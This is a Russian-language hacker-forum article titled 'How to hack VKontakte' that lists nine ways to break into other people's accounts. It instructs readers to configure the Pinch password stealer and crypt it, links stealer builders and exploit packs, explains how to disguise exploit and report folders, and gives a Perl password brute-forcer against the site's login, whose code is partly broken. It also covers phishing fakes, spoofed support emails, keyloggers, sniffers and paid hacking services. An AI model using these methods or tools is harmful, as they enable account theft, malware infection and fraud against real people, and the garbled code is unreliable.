Как взломать Контакт
В данной статье, попытаюсь рассказать о возможных способах взлома анкет "ВКонтакте".
Итак, что же нам потребуется:
Умение настраивать пинч (если это у вас уже получилось, то остальные 2 требования можно не смотреть)
Прямые руки и хотя бы капелька мозга!
1 Способ - Взлом мыла:
Если мы его знаем то уже все проще, ведь имеется как минимум 15 методов
взлома почты. Но есть и один минус, если пароль "корявый", он
разумеется надежный, но с его восстановлением проблемы, когда такой
высылают на почту, то он принимает "левый" вид, и соответственно не
работает. Не в этом суть, поэтому останавливаться не будем.
2 Способ - Фейк:
Достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд), скачать его можно по этой ссылке.
3 Способ - Троян:
Этот способ мы разберём по пунктам:
а) Скинуть "чистый" файл, либо ссылку на загрузку трояна, но тут еще
надо чтобы пользователь его запустил. http://slil.ru/25774480 - здесь
лежит билдер пинча, а здесь парсер http://slil.ru/25774491 , если вы
захотите чтобы отчеты шли на гейт - вот подходящий от Генома -
http://slil.ru/25774495
б) Кейлогер - менее полезный, но
если жертва его "словит", и вы покопаетесь (причем очень долго) с
отчетом, то пароль получите 100%
в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном, примерно, 6/10.
Советую армитаж (айс пак тоже в теме). Прост в настройке, нужно только
создать базу мускуль(делается в пару кликов), и отредактировать файлы
(db.php config.php), после того как зальете на хост, выставляем нужные
права, на папку load - 777. config.php - 777
Скачать 3 связки можно по ссылке http://slil.ru/25776403 - здесь лежат мпак, айспак и армитаж
Когда будите настраивать пинч, устанавите права на гейт 775, на папку в
которую будут идти отчеты - 777, и не забывайте что не надо называть
папку с отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или
еще как, ну чтобы внимания не привлекало. Папку в которой будет лежать
сплоит, тоже
переиминуйте на что-нибудь типа myphotos и тд. т.к.
люди будут эту ссылку себе в браузер пихать, не нужно что бы там было
написанно EXPLOIT - лишнее палево ни к чему.
Идем дальше...
Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был.
Заходим по ссылке на файл install.php нашего сплоита, а потом идем в
админку, устанавливаем настройки, выбераем файл который будет грузится
жертве, теперь он будет лежать в папке load под именем file.
Кидаем ссылку жертве, и ждем с надеждой на то, что ее пробьет и отчет с заветным паролем придет к нам.
4 Способ - Брутфорс:
Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает (нп-р в случае пароля D5&%-AefV)
Для этого брутфорсера нам потребуется активперл скачать мона тут
http://download.softportal.com/softw…ctiveperl.html либо по ссылке
http://www.denwer.ru/packages/perl.html
Code #!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;
open (pass, "create(&Brut, $_);}
for(@trl) { $_->join; }
sub Brut
{
while (@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>’tcp’,PeerAddr=>’vkontakte.ru’,PeerPor t=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0rn”.
"Host: vkontakte.rurn”.
"Accept: */*rn”.
"Content-Type: application/x-www-form-urlencodedrn”.
"User-Agent: Mozillorn”.
"C*****: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn”.
"Connection: closernrn”;
$answ = ;
close $sock;
print "$pass $answ”;
if ($answ =~ /302/){
open (good, ‘>>good.txt’);
print good "$id:$pass:$md5n”;
print "$id:$pass:$md5n”;
close good;
exit;}
}
}
goto Next;
sub pass
{
my (@mas);
while (){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
Не забудьте сменить разширение на brut.pl
$dic = ‘passl.txt’; #паслист для брдутфорсера
$id = 1; #айдишник цели(его можно взять из адресной строки когда вы зашли на страницу жертвы)
$mail = ‘мыло’; #мыло, значек @ меняем на %40
$threads = Х; # где Х - количество потоков
Если вам лень копаться со всем этим, то есть неплохой брут на С.
Скачать его можно по ссылке http://slil.ru/25774498, сразу говорю, если
не запускается - это ваши проблемы, ибо все прекрасно работает!
5 Способ
Самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код ******
Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем
вероятность того, что юзера пробьет, либо через браузер, либо через
тупость, т.к. теперь у нас на ссылке комбинированная атака на мозг
(фейк) и браузер (код ******).
6 Способ:
Довольно известный, здесь нужно поискать сайты на которых сидит жертва
(форумы, почта и пр) и попытаться похекать что-то из
вышеперечисленного, авось найдем старый заброшенный пароль, а он
подойдет.
7 Способ:
Как обычно СИ, пробуем
отправить письмо от адресата durov@vkontakte.ru или
support@vkontakte.ru с текстом типа, ваша страница на сайте
vkontakte.ru будет заблокированна через N дней, если вы не подтвердите
какую-нить хрень, методом отправки нам пароля.
Или, можно
прислать письмо типа, вам пришло личное сообщение/открытка и т.п., от
такого-то пользователя, чтобы ее прочитать перейдите по ссылке, а
ссылка будет вести на наш фейк.
Чтобы отправить письмо с
"левого" адреса, нужен какой-нить майлер, например, этот
http://softnic.ru/soft/programm_4223.html, либо любой подходящий для
вас из гугла.
Только не забудьте зарегить себе не
привлекающее мыло, похожее на суппортское, и вписать его в поле копия.
(чтобы пароли пришли именно вам на почту).
Снифер, тут лучше
отправлять его на почту (если мы знаем мыло), тогда без лишних проблем
сможем перехватить сессию, и с помощью системы восстановления пароля на
сайте вконтакте получить письмо с паролем.
http://forum.antichat.ru/showthread.php?p=457280
Есть сниферы и получше, но они платные, все же тема распространена, в
гуле можно ввсести запрос на php снифер и найти много полезной инфы.
8 Способ - ХSS:
Паблик дырок на этом сайте нету, так что кража кукисов маловероятна,
хотя если очень долго подождать, то можно и дождаться паблик уязвимости
- но
такой подход к делу бредовый, поэтому останавливаться на нем не будем.
9 Способ - Самый простой:
Единственное что от вас требуется - уметь работать с платежными
системами и иметь деньги. Просто закажите взлом если вам не помог ни
один из вышеперечисленных пунктов, может найдется умелец который
сломает неприступную жертву. Поискать такогого можно здесь -
http://www.hackzone.ru/forum/list/fid/23/ или здесь
http://www.hackzone.ru/forum/list/fid/4/
Но перед тем как задать вопрос воспользуйтесь полезными ссылками:
google.ru
http://www.poiskinfo.net/stat/st1.php
http://segfault.kiev.ua/smart-questions-ru.html
http://penguin.kurgan.ru/doc/Perl/perlfaq1.htm
Ну и на последок - googleforidiots.com
На этом все, надеюсь вам не было скучно при чтении этой статьи.
|
Норм